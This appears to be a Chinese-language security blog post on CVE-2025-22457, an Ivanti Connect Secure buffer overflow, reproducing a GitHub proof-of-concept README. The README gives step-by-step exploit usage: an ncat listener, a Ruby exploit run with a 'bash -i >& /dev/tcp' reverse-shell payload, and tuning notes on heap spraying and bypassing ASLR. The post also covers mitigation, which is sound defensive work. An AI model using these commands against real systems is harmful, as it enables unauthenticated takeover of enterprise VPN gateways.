Ivanti Connect Secure 缓冲区溢出漏洞

漏洞信息

漏洞名称: Ivanti Connect Secure 缓冲区溢出漏洞

漏洞编号:

  • CVE: CVE-2025-22457

漏洞类型: 缓冲区溢出

漏洞等级: 严重

漏洞描述: ### 受影响产品
Ivanti Connect Secure是一款广泛使用的企业级安全连接解决方案,主要用于提供安全的远程访问服务。它通常部署在企业环境中,用于保护员工的远程访问需求。Ivanti Policy Secure和Ivanti ZTA Gateways也是Ivanti提供的安全产品,用于策略执行和零信任架构的网关服务。Pulse Connect Secure是另一款类似的产品,但已经到达生命周期终点(EoS)。这些产品在企业中广泛部署,因此该漏洞的影响范围较大。

漏洞解释

该漏洞是一个严重的基于栈的缓冲区溢出漏洞,类型为缓冲区溢出。其技术根源在于处理某些输入时,未能正确验证输入的长度,导致攻击者可以覆盖栈上的关键数据,从而执行任意代码。这种漏洞通常由于编程时未对用户输入进行严格的边界检查所致。

影响分析

此漏洞允许未经身份验证的攻击者远程执行代码,这意味着攻击者可以在不需要任何用户交互或认证的情况下,完全控制受影响的系统。由于漏洞的严重性和易利用性,它已经被多个间谍组织(疑似与中国有关联)在野利用,使用的恶意软件包括TRAILBLAZE(投放器)、BRUSHFIRE(后门)和SPAWN恶意软件生态系统。这种漏洞的利用可以导致数据泄露、服务中断,甚至可以作为进一步攻击的跳板。由于漏洞的利用不需要认证,且可以自动化执行,因此其风险极高。

产品厂商: Ivanti

产品名称: Ivanti Connect Secure, Ivanti Policy Secure, Ivanti ZTA Gateways, Pulse Connect Secure

影响版本: Ivanti Connect Secure (≤ 22.7R2.5), Ivanti Policy Secure (≤ 22.7R1.3), Ivanti ZTA Gateways (≤ 22.8R2), Pulse Connect Secure (≤ 9.1R18.9, EoS)

来源: https://github.com/B1ack4sh/Blackash-CVE-2025-22457

类型: CVE-2025:github search

仓库文件

  • README.md

来源概述

CVE-2025-22457: Critical Ivanti Connect Secure Vulnerability ⚡

⚠️ CVE-2025-22457 Overview

🛡️ Type: Critical stack-based buffer overflow
💻 Affected Products:

  • Ivanti Connect Secure (≤ 22.7R2.5)
  • Ivanti Policy Secure (≤ 22.7R1.3)
  • Ivanti ZTA Gateways (≤ 22.8R2)
  • Pulse Connect Secure (≤ 9.1R18.9, EoS)

🔥 Impact: Remote unauthenticated code execution

📅 Patch Release Dates

🛠️ Product 📦 Fixed Version 📆 Release Date
Ivanti Connect Secure 22.7R2.6 Feb 2025
Ivanti Policy Secure 22.7R1.4 April 21, 2025
Ivanti ZTA Gateways 22.8R2.2 April 19, 2025

🚨 Exploitation in the Wild

  • 🕵️‍♂️ Active since mid-March 2025
  • 🎯 Targeted by espionage groups (suspected China-linked)
  • 💀 Uses malware: TRAILBLAZE (dropper), BRUSHFIRE (backdoor), SPAWN malware ecosystem

✅ Mitigation Steps

  1. ⬆️ Update affected systems immediately
  2. 🔍 Detect compromises with Integrity Checker Tool (ICT)
  3. 🕵️‍♀️ Investigate and isolate suspected systems
  4. 🔑 Reset certificates, keys, and passwords
  5. 📊 Monitor logs for unusual activity continuously

🚨 Usage:

We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:

Start a netcat listener to catch the reverse shell.

1
sudo ncat -lnvkp 8080

Run the exploit and brute force ASLR (This will be slow).

1
2
3
4
5
6
7
8
9
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering..

When it works you will get a reverse shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sudo ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$

📡 Debug:

Web Child Processes:

Depending on the underlying hardware, the number of CPUs available to the target appliance will dictate the number of child processes the /home/bin/web binary will spawn. As all incoming HTTPS requests will be distributed evenly between these children, we need to account for this and perform the heap spray enough times for all child processes. We need to do this as when we trigger the vulnerability, we cannot know what child process we will trigger it in. So we need the heap spray to be present in every child process.

  • 1 vCPU - 1 web process, no children
  • 2 vCPU - 1 web parent, 2 children
  • 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
  • 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)

For example, in a rooted vulnerable appliance, run the following to see the number of child /home/bin/web processes:

1
2
3
4
5
6
7
8
9
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#

You can specify the expected number of web children via the –web_children argument, for example:

1
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4

libdsplibs Base Address

If you are testing the PoC on a local system, you may want to avoid bruteforcing the libdsplibs base address. In this scenario, you can pass a known base address to the PoC via the –libdsplibs argument. For example, in a rooted vulnerable appliance, run the following:

1
2
3
4
5
6
7
8
9
10
11
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#

Then you can pass the know base address to the PoC as follows:

1
2
3
4
5
6
7
8
9
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...

⚠️ Disclaimer:

The information provided here is for educational and awareness purposes only. Always follow your organization’s security policies and procedures when applying patches or performing security assessments. Unauthorized exploitation or scanning of systems without permission is illegal and unethical. Stay responsible and secure! 🛡️🔒

Github Poc
#CVE-2025:github search #缓冲区溢出
Ivanti Connect Secure 缓冲区溢出漏洞
http://example.com/2025/07/13/github_874970738/
作者
lianccc
发布于
2025年7月13日
许可协议